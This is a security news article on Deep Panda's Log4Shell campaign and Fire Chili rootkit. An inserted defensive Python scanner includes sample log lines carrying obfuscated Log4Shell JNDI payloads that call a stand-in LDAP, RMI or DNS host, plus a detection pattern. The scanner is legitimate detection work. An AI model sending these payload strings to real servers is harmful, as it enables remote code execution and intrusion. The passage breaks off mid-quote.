Deep Panda Returns With Log4Shell Exploits, New Fire Chili Rootkit


Deep Panda has launched new attacks this month that exploit Log4Shell to deploy the new Fire Chili rootkit.

Deep Panda is a Chinese advanced persistent threat (APT) hacking group that has been active for at least a decade. The APT targets government, defense, healthcare, telecoms, and financial organizations, to name a few, for purposes including data theft and surveillance.

The group maintains a wide range of malicious tools, including the Milestone backdoor and the Infoadmin Remote Access Trojan (RAT), which is based on Gh0st RAT code. It may also be affiliated with Winnti, a separate Chinese group known for targeting game developers and vendors.

FortiGuard Labs researchers have attributed a newly detected campaign to Deep Panda; it targets organizations in the finance, travel, and cosmetics industries.

During the past month, FortiGuard has observed the group actively exploiting Log4Shell, a critical vulnerability in the Apache Log4J Java logging library (CVE-2021-44228, CVSS 10.0), to spread a novel rootkit.

Attackers from various groups use Log4Shell to compromise VMware Horizon servers for data exfiltration and cryptojacking.
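Defenders hunting for the Log4Shell exploitation described above usually start from web or application access logs. The scanner below is an added example, not code from the article or from FortiGuard: it URL-decodes each line, unwraps the common Log4j lookup obfuscations (`${lower:...}`, `${upper:...}` and the `${...:-default}` form) and then matches the JNDI lookup, run over constructed sample log lines.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the article). Line 1 is benign,
# line 2 is a plain probe, lines 3 and 4 use nested lookups to hide the "jndi" keyword.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2022:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Mar/2022:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.7 - - [01/Mar/2022:10:00:02 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.0"
10.0.0.8 - - [01/Mar/2022:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://example.invalid/c}"
"""

# Innermost ${...} with no nested braces; evaluated repeatedly, inside out, like Log4j does.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# Final form of the lookup; protocols are the JNDI providers abused in the wild.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|nis|nds|corba)\s*:", re.IGNORECASE)


def _reduce(m):
    """Resolve one innermost lookup the way Log4j 2.x would; leave unknown ones intact."""
    body = m.group(1)
    if ":-" in body:                      # ${anything:-default} -> default (e.g. ${::-j} -> j)
        return body.split(":-", 1)[1]
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":   # ${lower:J} -> j
        return rest.lower()
    if sep and head.lower() == "upper":   # ${upper:j} -> J
        return rest.upper()
    return m.group(0)                     # e.g. ${jndi:...} itself stays for the matcher


def normalize(s, max_rounds=20):
    """Collapse nested lookup obfuscation until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_reduce, s)
        if new == s:
            break
        s = new
    return s


def scan(log_text):
    """Return (line number, JNDI protocol, was_obfuscated) for every suspicious line."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        decoded = unquote(line)
        norm = normalize(decoded)
        m = _JNDI.search(norm)
        if m:
            hits.append((lineno, m.group(1).lower(), norm != decoded))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The third tuple element flags lines where the payload only became visible after de-obfuscation, which is a stronger signal of deliberate evasion than a plain probe.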

In Deep Panda’s case, the new rootkit, dubbed Fire Chili, is designed to keep activities under the radar and is deployed alongside the Milestone backdoor.

Fire Chili is signed with a stolen digital certificate, the same one Winnti has used to sign its malicious tools, and it checks that the victim machine is not running in safe mode.

“It then checks
